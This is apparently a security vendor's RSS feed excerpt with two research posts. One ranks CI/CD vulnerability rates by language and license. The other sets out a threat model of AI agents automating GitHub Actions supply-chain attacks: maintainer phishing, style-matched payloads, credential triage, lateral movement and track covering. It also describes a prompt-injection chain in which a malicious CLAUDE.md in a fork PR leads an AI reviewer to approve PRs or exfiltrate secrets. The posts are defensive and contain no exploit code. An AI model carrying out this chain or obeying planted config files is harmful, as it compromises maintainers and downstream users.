&lt;p&gt;Rust repos from major organizations have even higher vulnerability rates than the Rust average, because organizational Rust projects tend to have the most complex CI - cross-compiling for embedded targets, running Miri and Clippy in CI, building for WebAssembly alongside native targets.&lt;/p&gt; 
&lt;p&gt;Python repos from major organizations show a different pattern: lower overall vulnerability rates (39.5%) but higher rates of critical findings, because Python CI often involves deployment workflows with cloud credential access.&lt;/p&gt; 
&lt;p&gt;The language risk matrix isn’t just about frequency - it’s about the type of exposure. Rust’s 77.9% is mostly medium-severity unpinned actions. Some languages with lower overall rates have higher concentrations of critical taint-to-execution chains.&lt;/p&gt; 
&lt;h2&gt;The AGPL Paradox&lt;/h2&gt; 
&lt;p&gt;License choice tells a parallel story:&lt;/p&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
   &lt;th&gt;License&lt;/th&gt; 
   &lt;th&gt;Vuln Rate&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;AGPL-3.0&lt;/td&gt; 
   &lt;td&gt;&lt;strong&gt;65.5%&lt;/strong&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Apache-2.0&lt;/td&gt; 
   &lt;td&gt;49.1%&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;GPL-3.0&lt;/td&gt; 
   &lt;td&gt;46.8%&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;MIT&lt;/td&gt; 
   &lt;td&gt;42.0%&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;BSD-2-Clause&lt;/td&gt; 
   &lt;td&gt;&lt;strong&gt;35.0%&lt;/strong&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;p&gt;AGPL repos - the most restrictive about code freedom - have the highest CI/CD vulnerability rate. BSD-2-Clause - the most permissive - has the lowest. The same structural explanation applies: AGPL repos tend to be self-hosted platforms with elaborate multi-stage build and deployment pipelines (think Git hosting platforms, low-code tools, workflow automation). Simpler MIT-licensed libraries have simpler CI.&lt;/p&gt; 
&lt;p&gt;The correlation between project complexity, CI complexity, and CI vulnerability is the throughline across both the language and license analyses.&lt;/p&gt; 
&lt;h2&gt;The Popularity Penalty - Amplified by Language&lt;/h2&gt; 
&lt;p&gt;The &lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan"&gt;Popularity Penalty&lt;/a&gt; - where more starred repos have higher vulnerability rates - is amplified when viewed through the language lens.&lt;/p&gt; 
&lt;p&gt;High-star Rust repos (10K+ stars) have even higher vulnerability rates than the Rust average. These are the foundational tools - Tokio, Serde, Clap, and their peers - with the most complex CI matrices targeting the most platforms. The repos the Rust ecosystem depends on most are the most exposed.&lt;/p&gt; 
&lt;p&gt;The same pattern holds for TypeScript: popular TypeScript frameworks with 50K+ stars have vulnerability rates approaching 70%, driven by complex build, test, and release automation across npm, CDN distribution, and documentation deployment.&lt;/p&gt; 
&lt;p&gt;The Popularity Penalty and the Language Risk Matrix compound: a high-star Rust repo is in the highest-risk position in the dataset, hit by both the complexity of Rust’s toolchain and the complexity that popularity drives.&lt;/p&gt; 
&lt;h2&gt;C and C++ - Deceptively Low&lt;/h2&gt; 
&lt;p&gt;C at 32.1% and C++ at 41.3% are lower than you might expect for languages with complex build toolchains. The explanation: many C and C++ projects predate GitHub Actions and use traditional CI systems (Jenkins, Travis CI, self-hosted runners) instead of, or alongside, GitHub Actions workflows.&lt;/p&gt; 
&lt;p&gt;C and C++ repos that do use GitHub Actions tend to have simpler workflow configurations - often just a single workflow running &lt;code&gt;make&lt;/code&gt; or &lt;code&gt;cmake&lt;/code&gt; with &lt;code&gt;actions/checkout&lt;/code&gt;. The complexity lives in the build system (Makefiles, CMake), not in the workflow file. This shifts the attack surface from the CI pipeline to the build toolchain itself - a different risk that Runner Guard doesn’t measure.&lt;/p&gt; 
&lt;p&gt;The implication: C and C++ vulnerability rates may be understated relative to their actual CI/CD risk, because the risk lives in build systems that GitHub Actions workflow scanning doesn’t cover.&lt;/p&gt; 
&lt;h2&gt;The Clean Repos - What They’re Doing Right&lt;/h2&gt; 
&lt;p&gt;Approximately 29,747 repos in our dataset have zero findings. What distinguishes them?&lt;/p&gt; 
&lt;p&gt;JavaScript and Python lead the clean repos - reinforcing the “simpler CI is safer” thesis. But the clean repos aren’t exclusively simple projects. Some are complex projects that have invested in CI/CD security: SHA-pinning their actions, scoping their permissions, using first-party GitHub actions where possible.&lt;/p&gt; 
&lt;p&gt;The common patterns among clean repos: - Minimal third-party action usage - first-party GitHub actions (&lt;code&gt;actions/*&lt;/code&gt;) where possible - SHA-pinned references where third-party actions are necessary - Scoped permissions (&lt;code&gt;permissions: read-all&lt;/code&gt; or explicit per-job grants) - Simple workflow structures without complex matrix builds or multi-step release pipelines&lt;/p&gt; 
&lt;p&gt;These aren’t impossible standards. They’re the baseline that the &lt;a href="https://www.vigilantdefense.com/research/fix-cicd-security-sha-pinning-least-privilege"&gt;Fix It guide&lt;/a&gt; walks through.&lt;/p&gt; 
&lt;h2&gt;What You Can Do About It&lt;/h2&gt; 
&lt;ol&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Know your language’s risk profile.&lt;/strong&gt; If you’re writing Rust, Go, or TypeScript, your CI/CD is statistically more likely to have supply chain vulnerabilities. That’s not a reason to change languages - it’s a reason to scan more frequently.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Audit your toolchain actions.&lt;/strong&gt; Each language ecosystem has its dominant setup actions - dtolnay/rust-toolchain for Rust, shivammathur/setup-php for PHP, ruby/setup-ruby for Ruby. Identify yours and SHA-pin them.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Simplify where possible.&lt;/strong&gt; Not every build matrix needs 12 targets. Not every release needs 5 platforms on day one. Complexity is the driver - reducing it reduces attack surface.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Watch single-maintainer dependencies.&lt;/strong&gt; The Rust ecosystem’s concentration on &lt;code&gt;rust-toolchain&lt;/code&gt; and &lt;code&gt;rust-cache&lt;/code&gt; is a specific, addressable risk. PHP’s concentration on &lt;code&gt;setup-php&lt;/code&gt; is another. Know which single-maintainer actions control your build toolchain.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Run Runner Guard against your language’s starter templates.&lt;/strong&gt; If you’re creating new repos from templates, those templates probably have unpinned actions. Fix the template, and every new repo starts secure.&lt;/p&gt; &lt;/li&gt; 
&lt;/ol&gt; 
&lt;p&gt;The language risk matrix isn’t a ranking of “good” and “bad” languages. It’s a map of where CI/CD complexity concentrates. The most complex build ecosystems need the most attention - and right now, they’re getting the least.&lt;/p&gt; 
&lt;p&gt;Every language community has its own version of this conversation to have. Rust needs to address its &lt;code&gt;rust-toolchain&lt;/code&gt;/&lt;code&gt;rust-cache&lt;/code&gt; dependency concentration. PHP needs to address its &lt;code&gt;setup-php&lt;/code&gt; single-point-of-failure. TypeScript needs to address its release pipeline complexity. JavaScript is closest to the right model - simple CI that minimizes third-party dependencies - but even JavaScript isn’t immune, as npm supply chain attacks have shown in a different layer of the stack.&lt;/p&gt;  
&lt;div class="v-related"&gt; 
 &lt;h2&gt;Related Articles&lt;/h2&gt; 
 &lt;ul&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;The Software Supply Chain Crisis - 74.5% of Findings Are Unpinned Actions&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/fix-cicd-security-sha-pinning-least-privilege"&gt;Fix It - SHA Pinning, Least Privilege, and the 5-Minute Security Upgrade&lt;/a&gt;&lt;/li&gt; 
 &lt;/ul&gt; 
&lt;/div&gt;  
&lt;p&gt;&lt;strong&gt;Scan your repos today.&lt;/strong&gt; &lt;a href="https://www.vigilantdefense.com/resources/runner-guard"&gt;Runner Guard&lt;/a&gt; is Vigilant’s free, open-source CI/CD security scanner - the same tool that powered this research. Install it in under a minute:&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-bash"&gt;brew install Vigilant-LLC/tap/runner-guard
runner-guard scan github.com/owner/repo
&lt;/code&gt;&lt;/pre&gt; 
&lt;div class="v-cta-buttons"&gt;
 &lt;a href="https://github.com/Vigilant-LLC/runner-guard" class="v-btn v-btn-primary"&gt;Install Runner Guard&lt;/a&gt;
 &lt;a href="https://www.vigilantdefense.com" class="v-btn v-btn-secondary"&gt;Learn More About Vigilant&lt;/a&gt;
&lt;/div&gt; 
&lt;p&gt;14 security rules. Zero configuration. One command.&lt;/p&gt;   
&lt;img src="https://track.hubspot.com/__ptq.gif?a=45116655&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fvigilantdefense.com%2Fresearch%2Flanguage-risk-matrix-rust-repos-cicd-security&amp;amp;bu=https%253A%252F%252Fvigilantdefense.com%252Fresearch&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>Github</category>
      <category>CICD</category>
      <pubDate>Tue, 24 Mar 2026 18:05:51 GMT</pubDate>
      <author>sales@vigilantnow.com (Chris Nyhuis)</author>
      <guid>https://vigilantdefense.com/research/language-risk-matrix-rust-repos-cicd-security</guid>
      <dc:date>2026-03-24T18:05:51Z</dc:date>
    </item>
    <item>
      <title>AI Agents as Force Multipliers — The Next Evolution of Supply Chain Attacks</title>
      <link>https://vigilantdefense.com/research/ai-agents-cicd-supply-chain-force-multipliers</link>
      <description>&lt;div&gt; 
 &lt;div style="font-weight: bold; font-size: 1rem; color: #07161d;"&gt;
  Chris Nyhuis
 &lt;/div&gt; 
 &lt;div style="font-size: 0.85rem; color: #6b7280; font-weight: 500;"&gt;
  CEO, Vigilant
 &lt;/div&gt; 
 &lt;div style="font-size: 0.8rem; color: #9ca3af; font-weight: 500;"&gt;
  10 min read
 &lt;/div&gt; 
&lt;/div&gt;</description>
      <content:encoded>&lt;div&gt; 
 &lt;div style="font-weight: bold; font-size: 1rem; color: #07161d;"&gt;
  Chris Nyhuis
 &lt;/div&gt; 
 &lt;div style="font-size: 0.85rem; color: #6b7280; font-weight: 500;"&gt;
  CEO, Vigilant
 &lt;/div&gt; 
 &lt;div style="font-size: 0.8rem; color: #9ca3af; font-weight: 500;"&gt;
  10 min read
 &lt;/div&gt; 
&lt;/div&gt;  
&lt;div style="font-size: 0.85rem; color: #00a19b; font-style: italic; margin-bottom: 1.5rem;"&gt;
 Part of a 9-part research series on CI/CD pipeline security. 
 &lt;a href="#related-articles" style="color: #ff5d2c; text-decoration: none;"&gt;See all articles below.&lt;/a&gt;
&lt;/div&gt; 
&lt;blockquote&gt; 
 &lt;p&gt;The tj-actions incident was the dress rehearsal. An AI-orchestrated version would be the main event - faster, stealthier, and hitting orders of magnitude more targets simultaneously.&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;h2&gt;The Setup&lt;/h2&gt; 
&lt;p&gt;In our &lt;a href="https://www.vigilantdefense.com/research/cicd-chain-attack-anatomy-recon-to-exfiltration"&gt;anatomy of a CI/CD chain attack&lt;/a&gt;, we walked through the five steps from reconnaissance to exfiltration. That chain - as it exists today - is manual. A human attacker identifies targets, compromises an account, writes a payload, and monitors the exfiltration. The tj-actions/changed-files incident in March 2025 followed this playbook. It was discovered and contained within days because human-paced attacks leave human-sized gaps.&lt;/p&gt; 
&lt;p&gt;AI agents change the calculus. Every step of the chain attack can be automated, parallelized, and adapted in real time. The skill barrier drops from “APT group with months of planning” to “motivated individual with API access.” The speed shifts from days to hours. The scale shifts from one action to hundreds simultaneously.&lt;/p&gt; 
&lt;p&gt;This isn’t speculation. Our scan - the reconnaissance phase of exactly this kind of attack - ran autonomously across 50,012 repos and identified 20,265 vulnerable targets with 192,776 findings in days with minimal human effort. We built it to find vulnerabilities. An adversary would build it to exploit them.&lt;/p&gt; 
&lt;h2&gt;How AI Amplifies Each Step&lt;/h2&gt; 
&lt;h3&gt;Step 1: Reconnaissance - From Days to Hours&lt;/h3&gt; 
&lt;p&gt;Traditional recon requires an attacker to manually scan repositories, map dependencies, and prioritize targets. An AI agent does this at API speed. It scans millions of repos in hours, builds dependency graphs automatically, and ranks targets by blast radius - how many downstream consumers each action has, how many forks each repo has, how sensitive the CI environment appears to be.&lt;/p&gt; 
&lt;p&gt;Our Runner Guard scan proves this is already feasible with today’s tooling. 50K repos scanned, 20,265 vulnerable targets mapped, compound vulnerability patterns identified - all automated. An attacker with similar tooling would have the same output but a different objective.&lt;/p&gt; 
&lt;h3&gt;Step 2: Compromise - Personalized at Scale&lt;/h3&gt; 
&lt;p&gt;AI-generated phishing campaigns can be personalized from a maintainer’s public footprint - their GitHub activity, conference talks, blog posts, LinkedIn profile. The targeting isn’t generic “Dear User” - it’s contextual, referencing the maintainer’s recent commits, their open issues, the specific projects they work on.&lt;/p&gt; 
&lt;p&gt;For high-value single-maintainer targets - &lt;code&gt;action-gh-release&lt;/code&gt; (1,405 repos), &lt;code&gt;rust-toolchain&lt;/code&gt; (989 repos), &lt;code&gt;setup-php&lt;/code&gt; (1,147 repos) - the AI agent can research the maintainer’s public presence and craft targeted approaches that feel like legitimate community interaction. A well-crafted issue about a specific edge case in the maintainer’s action, linking to a page that harvests credentials. The social engineering is the same; the personalization scales with AI.&lt;/p&gt; 
&lt;h3&gt;Step 3: Payload - Polymorphic Code Generation&lt;/h3&gt; 
&lt;p&gt;Here’s where AI creates a qualitatively new threat. An AI agent can generate payload code that matches the target action’s existing code style - variable naming conventions, comment patterns, error handling approach, formatting. The malicious commit looks like it belongs in the codebase. Human review, if it happens, is less likely to flag code that “looks normal.”&lt;/p&gt; 
&lt;p&gt;The payload can be polymorphic - different for each target action, adapting to the codebase it’s injecting into. Traditional payloads are detectable because they’re static patterns. AI-generated payloads are detectable only by behavior analysis, which most CI/CD environments don’t perform.&lt;/p&gt; 
&lt;h3&gt;Step 4: Propagation - Real-Time Monitoring&lt;/h3&gt; 
&lt;p&gt;An AI agent can monitor CI runs across the compromised action’s consumers in real time. It can confirm which repos have triggered, verify exfiltration success, and adapt if a payload is detected or blocked. If one approach fails for a specific consumer, the agent can regenerate and push an updated payload within minutes.&lt;/p&gt; 
&lt;p&gt;From our data: &lt;a href="https://www.vigilantdefense.com/research/docker-chokepoint-github-actions-supply-chain"&gt;docker/login-action@v3 alone would hit 1,848 repos&lt;/a&gt;. An AI agent monitoring those 1,848 CI runs could triage exfiltrated credentials by value - prioritizing cloud production credentials over development tokens, registry push tokens over read-only access - and begin lateral movement on the highest-value targets within the same time window.&lt;/p&gt; 
&lt;h3&gt;Step 5: Lateral Movement - Autonomous Pivoting&lt;/h3&gt; 
&lt;p&gt;Stolen credentials become the input to the next agent loop. Cloud credentials → enumerate infrastructure → identify sensitive data → exfiltrate. Registry tokens → push backdoored packages → impact downstream consumers. GITHUB_TOKEN → push code to the downstream repo → establish persistent access.&lt;/p&gt; 
&lt;p&gt;An AI agent can perform this lateral movement autonomously, pivoting from one compromised environment to the next without human direction. Each credential opens a new branch of the attack tree. The agent explores all branches simultaneously.&lt;/p&gt; 
&lt;h3&gt;Step 6: Covering Tracks&lt;/h3&gt; 
&lt;p&gt;A human attacker might forget to restore the original action code after the exfiltration window closes. An AI agent won’t. It can move the tag back to the legitimate commit, clean up artifacts, and close the window - leaving minimal forensic evidence that the attack ever occurred.&lt;/p&gt; 
&lt;h2&gt;The Data Backs It Up&lt;/h2&gt; 
&lt;p&gt;Our scan contains the evidence that this threat model is real and the attack surface is already in place:&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;The reconnaissance phase works.&lt;/strong&gt; 20,265 vulnerable repos identified with 192,776 findings from public data, automated, in days. The tooling to map the entire GitHub Actions supply chain already exists.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;The targets are concentrated.&lt;/strong&gt; &lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;Single-maintainer chokepoints&lt;/a&gt; and &lt;a href="https://www.vigilantdefense.com/research/docker-chokepoint-github-actions-supply-chain"&gt;organizational concentration&lt;/a&gt; mean an attacker doesn’t need to compromise hundreds of accounts. A handful of high-value targets - &lt;code&gt;action-gh-release&lt;/code&gt;, &lt;code&gt;rust-toolchain&lt;/code&gt;, Docker - cover thousands of downstream repos.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;The compound vulnerabilities are pre-staged.&lt;/strong&gt; 3,172 repos have the complete attack chain already assembled: unpinned action + write permissions. 611 have the triple compound. These aren’t targets that need exploitation - they’re targets that need one compromised dependency to cascade into full compromise.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;AI is already in CI/CD.&lt;/strong&gt; anthropics/claude-code-action is used unpinned in 175 repos, nearly doubling during our scan from 77 to 175 repos. Hundreds of &lt;code&gt;claude-*.yml&lt;/code&gt;, &lt;code&gt;copilot-*.yml&lt;/code&gt;, and &lt;code&gt;ai-*.yml&lt;/code&gt; workflows exist across top repos. AI in CI is mainstream - and growing faster than security awareness.&lt;/p&gt; 
&lt;h2&gt;The AI-in-CI Paradox&lt;/h2&gt; 
&lt;p&gt;The most ironic dimension of this threat isn’t AI attacking CI/CD - it’s AI defending CI/CD while simultaneously creating new attack surfaces.&lt;/p&gt; 
&lt;p&gt;Repos are deploying AI agents - Claude, Copilot, and others - to review pull requests automatically. These agents load configuration files from the repository checkout: &lt;code&gt;CLAUDE.md&lt;/code&gt;, &lt;code&gt;.cursorrules&lt;/code&gt;, &lt;code&gt;copilot-instructions.md&lt;/code&gt;. When the workflow trigger is &lt;code&gt;pull_request_target&lt;/code&gt;, the checkout includes untrusted fork code.&lt;/p&gt; 
&lt;p&gt;The attack chain:&lt;/p&gt; 
&lt;ol&gt; 
 &lt;li&gt;Attacker submits a PR to a repo using AI-powered PR review&lt;/li&gt; 
 &lt;li&gt;The PR includes a malicious AI config file (&lt;code&gt;CLAUDE.md&lt;/code&gt; with adversarial instructions)&lt;/li&gt; 
 &lt;li&gt;The AI agent loads the config during automated review on &lt;code&gt;pull_request_target&lt;/code&gt;&lt;/li&gt; 
 &lt;li&gt;The AI follows the attacker’s instructions - approving the PR, exfiltrating secrets, or modifying the review output&lt;/li&gt; 
 &lt;li&gt;The AI agent designed to improve security becomes the attack vector&lt;/li&gt; 
&lt;/ol&gt; 
&lt;p&gt;RGS-010 - our detection rule for this class of attack - found 5 findings across 4 repos, including a leading Python AI framework (4 findings) and a major browser organization. Runner Guard is currently the only scanner detecting AI config injection in CI/CD.&lt;/p&gt; 
&lt;p&gt;The AI tools being deployed to defend pipelines are themselves creating novel attack surfaces that traditional scanners don’t detect. The paradox: the more AI we deploy in CI/CD for security, the more AI-specific attack surface we create.&lt;/p&gt; 
&lt;h2&gt;claude-code-action: Case Study in AI Supply Chain Growth&lt;/h2&gt; 
&lt;p&gt;anthropics/claude-code-action provides the clearest growth trajectory data in our scan:&lt;/p&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
   &lt;th&gt;Scan Progress&lt;/th&gt; 
   &lt;th&gt;@v1 Repos&lt;/th&gt; 
   &lt;th&gt;Total Repos&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;40% complete&lt;/td&gt; 
   &lt;td&gt;77&lt;/td&gt; 
   &lt;td&gt;77&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;53.8% complete&lt;/td&gt; 
   &lt;td&gt;140&lt;/td&gt; 
   &lt;td&gt;99&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;100% complete&lt;/td&gt; 
   &lt;td&gt;140&lt;/td&gt; 
   &lt;td&gt;175&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;p&gt;The breakdown at 100%: - &lt;code&gt;@v1&lt;/code&gt; - 140 repos (standard release channel) - &lt;code&gt;@beta&lt;/code&gt; - 35 repos (early adopters on unstable channel) - &lt;code&gt;@eap&lt;/code&gt; - 3 repos (early access preview) - &lt;code&gt;@main&lt;/code&gt; - 1 repo (branch-pinned - worst case)&lt;/p&gt; 
&lt;p&gt;Adoption nearly doubled during our scan period. A major database company forked claude-code-action and runs their own copy at &lt;code&gt;@v1&lt;/code&gt;. The action itself isn’t the vulnerability - it does what it’s designed to do. The vulnerability is 175 repos trusting mutable tags for code that executes on every pull request with CI secrets access.&lt;/p&gt; 
&lt;p&gt;This is the pattern playing out in real time: a new AI tool gains traction, developers adopt it quickly, nobody SHA-pins it. The supply chain problem repeats faster than the ecosystem can learn from each iteration.&lt;/p&gt; 
&lt;h2&gt;AI Tools as OIDC Targets&lt;/h2&gt; 
&lt;p&gt;Several of the most popular AI tooling repositories have RGS-009 OIDC misconfigurations - cloud credential theft vectors sitting inside the AI ecosystem:&lt;/p&gt; 
&lt;ul&gt; 
 &lt;li&gt;A popular AI chat interface (85K-90K stars) - unsafe checkout with cloud credential access&lt;/li&gt; 
 &lt;li&gt;A popular multi-agent AI framework (60K-65K stars) - OIDC misconfig&lt;/li&gt; 
 &lt;li&gt;A popular AI desktop client (40K-45K stars) - 10 different rule categories, broadest profile&lt;/li&gt; 
&lt;/ul&gt; 
&lt;p&gt;These repos are building the tools that will power autonomous AI agents. Their own build pipelines are exploitable. An attacker who compromises the CI of an AI tool gains influence over every user of that tool - and the AI tool’s own behavior in downstream environments.&lt;/p&gt; 
&lt;h2&gt;The AI Ecosystem’s Blind Spot&lt;/h2&gt; 
&lt;p&gt;There’s a pattern across the AI repos in our dataset that’s worth naming explicitly: teams building AI tools focus intensely on model safety - alignment, guardrails, content filtering, prompt injection defenses - while paying almost no attention to the CI/CD pipeline that builds and deploys the tool itself.&lt;/p&gt; 
&lt;p&gt;The numbers tell the story. A popular LLM web interface (120K-130K stars) has 172 findings across 4 rule categories. A popular LLM inference engine (90K-100K stars) has 181 findings across 4 rules. A popular local LLM runtime (150K+ stars) has 36 findings across 3 rules. These are the repos building the AI infrastructure the industry depends on, and their CI/CD pipelines have taint-to-execution chains where untrusted input flows to code execution.&lt;/p&gt; 
&lt;p&gt;The AI safety community has spent enormous effort on making models safe to use. Almost none of that effort has been directed at making the build systems that produce those models safe from supply chain compromise. A backdoored CI/CD pipeline in an AI framework doesn’t care about model alignment - it has access to everything the build system touches.&lt;/p&gt; 
&lt;p&gt;This blind spot is particularly dangerous because AI repos tend to have complex CI/CD configurations - model training workflows, GPU-accelerated builds, multi-platform distribution, automated benchmarking - all of which create more action dependencies, more permission grants, and more attack surface.&lt;/p&gt; 
&lt;h2&gt;The HackerClaw Precedent&lt;/h2&gt; 
&lt;p&gt;Vigilant open-sourced Runner Guard’s CI/CD scanning capabilities from the ThreatCert platform specifically because of the HackerClaw campaign - an attack operation that demonstrated AI agents being used to exploit CI/CD pipelines at scale. The attack combined automated reconnaissance with LLM-generated social engineering to compromise action maintainers, using techniques nearly identical to the amplified chain attack we describe above.&lt;/p&gt; 
&lt;p&gt;HackerClaw proved that AI-orchestrated supply chain attacks aren’t a theoretical future risk - they’re a present reality. The campaign used AI for exactly the steps we outlined: automated target identification, personalized compromise attempts, and adaptive payload generation. The main difference between HackerClaw and the fully-autonomous scenario we describe is scale - HackerClaw still had humans directing the AI agents. The fully-autonomous version is an engineering problem, not a research one.&lt;/p&gt; 
&lt;p&gt;This is why Vigilant released Runner Guard as a free, open-source tool. The attack tooling is already being built. The defense tooling needs to be equally accessible.&lt;/p&gt; 
&lt;h2&gt;What This Means for Defense&lt;/h2&gt; 
&lt;p&gt;The AI force multiplier changes the defensive calculus in two ways:&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Speed of response matters more.&lt;/strong&gt; A human-paced attack gives defenders days to detect and respond. An AI-paced attack compresses that window to hours. The tj-actions incident was detected relatively quickly because the attack was crude - credentials were exfiltrated to a public gist. An AI-orchestrated version would use encrypted channels, rate-limited exfiltration, and adaptive payloads that change when detection seems likely.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Point-in-time scanning isn’t enough.&lt;/strong&gt; If an attack can execute and clean up within hours, a weekly or monthly scan will miss it entirely. &lt;a href="https://www.vigilantdefense.com/research/cicd-security-continuous-monitoring-beyond-snapshots"&gt;Continuous monitoring&lt;/a&gt; - scanning every hour, correlating CI/CD changes with other threat signals - is the defensive answer to AI-paced attacks. ThreatCert’s Temporal Shift Analysis detects when pipeline configurations change rapidly, flagging the velocity of change as a risk signal separate from the change itself.&lt;/p&gt; 
&lt;p&gt;The chain attack described in our &lt;a href="https://www.vigilantdefense.com/research/cicd-chain-attack-anatomy-recon-to-exfiltration"&gt;anatomy piece&lt;/a&gt; is the current threat. AI force multiplication is the near-future evolution. The defenses that work against both are the same: SHA-pin your actions (eliminating the entry point), scope your permissions (limiting the blast radius), and monitor continuously (detecting the attack in progress). The difference is urgency - the window for getting these basics right is closing faster than most teams realize.&lt;/p&gt; 
&lt;h2&gt;What You Can Do About It&lt;/h2&gt; 
&lt;ol&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;SHA-pin every action now.&lt;/strong&gt; Not next quarter. Not after the next sprint. The AI force multiplier compresses timelines. The supply chain that was “probably fine” when attacks were human-paced becomes critically exposed when attacks are AI-paced.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Audit AI tool deployments in CI/CD.&lt;/strong&gt; If your repos use claude-code-action, copilot-review, or any AI-powered PR review tool, verify they’re SHA-pinned and running on &lt;code&gt;pull_request&lt;/code&gt; (sandboxed) not &lt;code&gt;pull_request_target&lt;/code&gt; (secrets access). If they must run on &lt;code&gt;pull_request_target&lt;/code&gt;, add explicit authorization checks.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Treat AI config files as untrusted input.&lt;/strong&gt; &lt;code&gt;CLAUDE.md&lt;/code&gt;, &lt;code&gt;.cursorrules&lt;/code&gt;, &lt;code&gt;copilot-instructions.md&lt;/code&gt; - any file that configures an AI agent’s behavior should be treated with the same caution as executable code when checked out from untrusted sources (forks).&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Monitor for velocity changes.&lt;/strong&gt; An AI-orchestrated attack moves faster than human attacks. Temporal Shift Analysis - tracking how quickly pipeline configurations change - catches the rapid modifications that characterize automated attacks. Changes that happen faster than your team could plausibly make them are a signal.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Assume the attack surface will grow.&lt;/strong&gt; The number of AI tools in CI/CD is increasing month over month. Each new tool is another potential configuration injection target, another unpinned action reference, another supply chain dependency. Build the scanning habit now, before the attack surface outpaces your visibility.&lt;/p&gt; &lt;/li&gt; 
&lt;/ol&gt;  
&lt;div class="v-related"&gt; 
 &lt;h2&gt;Related Articles&lt;/h2&gt; 
 &lt;ul&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/cicd-chain-attack-anatomy-recon-to-exfiltration"&gt;Anatomy of a CI/CD Chain Attack - From Recon to Exfiltration in 5 Steps&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;The Software Supply Chain Crisis - 74.5% of Findings Are Unpinned Actions&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/docker-chokepoint-github-actions-supply-chain"&gt;The Docker Chokepoint - One Org, Six Actions, Thousands of Pipelines&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/cicd-security-continuous-monitoring-beyond-snapshots"&gt;Beyond Snapshots - Why CI/CD Security Needs Continuous Monitoring&lt;/a&gt;&lt;/li&gt; 
 &lt;/ul&gt; 
&lt;/div&gt;  
&lt;p&gt;&lt;strong&gt;Scan your repos today.&lt;/strong&gt; &lt;a href="https://www.vigilantdefense.com/resources/runner-guard"&gt;Runner Guard&lt;/a&gt; is Vigilant’s free, open-source CI/CD security scanner - the same tool that powered this research. Install it in under a minute:&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-bash"&gt;brew install Vigilant-LLC/tap/runner-guard
runner-guard scan github.com/owner/repo
&lt;/code&gt;&lt;/pre&gt; 
&lt;div class="v-cta-buttons"&gt;
 &lt;a href="https://github.com/Vigilant-LLC/runner-guard" class="v-btn v-btn-primary"&gt;Install Runner Guard&lt;/a&gt;
 &lt;a href="https://www.vigilantdefense.com" class="v-btn v-btn-secondary"&gt;Learn More About Vigilant&lt;/a&gt;
&lt;/div&gt; 
&lt;p&gt;14 security rules. Zero configuration. One command.&lt;/p&gt;   
